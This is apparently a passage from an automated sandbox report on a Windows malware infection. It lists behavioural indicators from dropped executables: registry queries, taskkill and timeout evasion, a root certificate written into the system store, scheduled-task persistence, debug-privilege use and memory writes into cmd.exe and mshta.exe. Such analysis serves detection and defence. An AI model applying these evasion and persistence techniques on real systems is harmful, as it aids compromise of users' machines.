Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\xishrtx\ukdupn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 1740 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 1740 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 1740 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 1740 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 2820 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2820 wrote to memory of 2828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
